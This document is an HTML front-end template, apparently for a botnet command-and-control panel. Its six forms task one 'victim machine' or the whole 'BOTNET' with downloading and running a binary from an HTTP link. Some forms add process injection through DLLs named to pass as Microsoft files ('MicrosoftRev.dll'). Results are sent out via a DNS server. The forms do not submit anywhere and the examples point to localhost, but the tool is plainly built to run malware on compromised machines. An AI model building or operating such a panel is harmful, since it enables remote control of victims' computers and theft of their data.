<app-menu></app-menu>
<h2>AUTO-EXECUTE ORIGINAL BINARY ON VICTIM MACHINE</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Enter parameters to AUTOEXECUTE PROGRAMS - Combine download + execution. The file must be in a HTTP server. Ex. "http://localhost/file.exe".</p>
  <p>Link HTTP of the file we want to put in BOT<input type="text" /></p>
  <p>Name + extension we want to rename inside the BOT Machine<input type="text" /></p>
  <p>Results File of execution in BOT Machine<input type="text" /></p>
  <p>DNS Server where upload results file<input type="text" /></p>
  <input type="submit" value="Execute" />
</form>

<h2>AUTO-EXECUTE ORIGINAL BINARY ON BOTNET</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Enter parameters to AUTOEXECUTE PROGRAMS in all BOTNET - Combine download + execution. The file must be in a HTTP server. Ex. "http://localhost/file.exe".</p>
  <p>Link HTTP of the file we want to put in BOT<input type="text" /></p>
  <p>Name + extension we want to rename inside the BOT Machine<input type="text" /></p>
  <p>Results File of execution in BOT Machine<input type="text" /></p>
  <p>DNS Server where upload results file<input type="text" /></p>
  <input type="submit" value="Execute" />
</form>

<h2>AUTO-EXECUTE BINARY WITHOUT MAGIC NUMBERS VIA PROCESS INJECTION ON VICTIM MACHINE</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Enter parameters to AUTOEXECUTE PROGRAMS - Combine download + execution. The file must be in a HTTP server. Ex. "http://localhost/binary".</p>
  <p>Link HTTP of the file we want to put in BOT("http://localhost/mrshll")<input type="text" /></p>
  <p>Name we want to rename inside the BOT Machine("mrshll")<input type="text" /></p>
  <p>DLL name created to inject in a process on victim machine ("MicrosoftRev.dll")<input type="text" /></p>
  <p>Results File of execution in BOT machine<input type="text" /></p>
  <p>DNS Server where upload results file<input type="text" /></p>
  <input type="submit" value="Execute" />
</form>

<h2>AUTO-EXECUTE BINARY WITHOUT MAGIC NUMBERS VIA PROCESS INJECTION ON BOTNET</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Enter parameters to AUTOEXECUTE PROGRAMS in BOTNET. - Combine download + execution. The file must be in a HTTP server. Ex. "http://localhost/binary".</p>
  <p>Link HTTP of the file we want to put in BOT("http://localhost/mrshll")<input type="text" /></p>
  <p>Name we want to rename inside the BOT Machine("mrshll")<input type="text" /></p>
  <p>DLL name created to inject in a process on victim machine ("MicrosoftRev.dll")<input type="text" /></p>
  <p>Results File of execution in BOT machine<input type="text" /></p>
  <p>DNS Server where upload results file<input type="text" /></p>
  <input type="submit" value="Execute" />
</form>

<h2>AUTO-EXECUTE BINARY WITHOUT MAGIC NUMBERS ON VICTIM MACHINE</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Enter parameters to AUTOEXECUTE PROGRAMS - Combine download + execution. The file must be in a HTTP server. Ex. "http://localhost/binary".</p>
  <p>Link HTTP of the file we want to put in BOT("http://localhost/webop")<input type="text" /></p>
  <p>Name we want to rename inside the BOT Machine("webop")<input type="text" /></p>
  <p>Name of DLL to convert the payload (MicrosoftWebOp.dll")<input type="text" /></p>
  <p>Results File of execution in BOT Machine ("MicrosoftOps")<input type="text" /></p>
  <p>DNS Server where upload results file("localhost")<input type="text" /></p>
  <input type="submit" value="Execute" />
</form>

<h2>AUTO-EXECUTE BINARY WITHOUT MAGIC NUMBERS ON BOTNET</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Enter parameters to AUTOEXECUTE PROGRAMS in all BOTNET. Combine download + execution. The file must be in a HTTP server. Ex. "http://localhost/binary".</p>
  <p>Link HTTP of the file we want to put in BOT("http://localhost/webop")<input type="text" /></p>
  <p>Name we want to rename inside the BOT Machine("webop")<input type="text" /></p>
  <p>Name of DLL to convert the payload (MicrosoftWebOp.dll")<input type="text" /></p>
  <p>Results File of execution in BOT Machine ("MicrosoftOps")<input type="text" /></p>
  <p>DNS Server where upload results file("localhost")<input type="text" /></p>
  <input type="submit" value="Execute" />
</form>
